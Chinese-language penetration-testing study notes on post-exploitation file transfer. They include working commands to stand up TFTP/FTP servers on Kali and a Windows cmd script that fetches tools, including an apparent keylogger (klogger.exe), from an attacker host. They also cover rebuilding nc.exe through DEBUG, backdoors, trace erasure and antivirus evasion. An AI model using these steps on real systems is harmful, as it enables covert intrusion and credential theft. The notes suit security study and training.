后渗透-文件传输

后渗透——文件传输

  • 上传工具

  • 提权

  • 擦除攻击痕迹

  • 安装后门

    • 长期控制
    • Dump密码
    • 内网渗透
  • 后漏洞利用阶段

    • 最大挑战——防病毒软件
    • 使用合法的远程控制软件

上传/下载文件

  • 持久控制
  • 扩大对目标系统的控制能力

Linux系统

  • netcat
  • curl
  • wget

Windows

  • 缺少预装的下载工具

  • 非交互式Shell

    • 类nc远程控制shell,无法与子命令交互
    • ftp 192.168.1.1
  • 使用TFTP传输文件

    • XP、2003默认安装,其它需要单独添加

    • 经常被便捷防火墙过滤

    • Kali

      1
      2
      3
      4
      mkdir /tftp
      cd /usr/share/windows-binaries
      ls
      cp /usr/share/windows-binaries/whoami.exe /tftp
  • 使用FTP传输文件

    • 先在kali安装pure-ftpd

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      apt-get install pure-ftpd
      groupadd ftpgroup
      useradd -g ftpgroup -d /dev/null -s /etc ftpuser
      pure-pw useradd pyrrhax -u ftpuser -d /ftphome
      pure-pw mkdb
      cd /etc/pure-ftpd/auth
      ln -s ../conf/PureDB 60pdb
      mkdir -p /ftphome
      chown -R ftpuser:ftpgroup /ftphome/
      /etc/init.d/pure-ftpd restart
    • 在windows使用cmd上下载文件

      1
      2
      3
      4
      5
      6
      7
      8
      echo open 192.168.0.112 21>ftp.txt
      echo pyrrhax>>ftp.txt
      echo password>>ftp.txt
      echo bin>>ftp.txt
      echo GET whoami.exe>>ftp.txt
      echo GET klogger.exe>>ftp.txt
      echo bye>>ftp.txt
      ftp -s:ftp.txt
    • 使用PowerShell下载文件

  • 使用DEBUG传输文件

    • 汇编、反汇编
    • 16进制dump工具
    • 64k字节
    • 过程:
      1. upx压缩文件
      2. wine exe2bat.exe nc.exe nc.hex
      3. debug<nc.hex
      4. copy 1.dll nc.exe

其它

  • plink.exe 命令行ssh连接工具
  • radmin.exe远程控制工具
  • sbd 类nc 程序
  • 可执行文件压缩工具upx
  • 可执行程序转文本 wine /usr/share/windows-binaries/exe2bat.exe xxxx.exe xxx.txt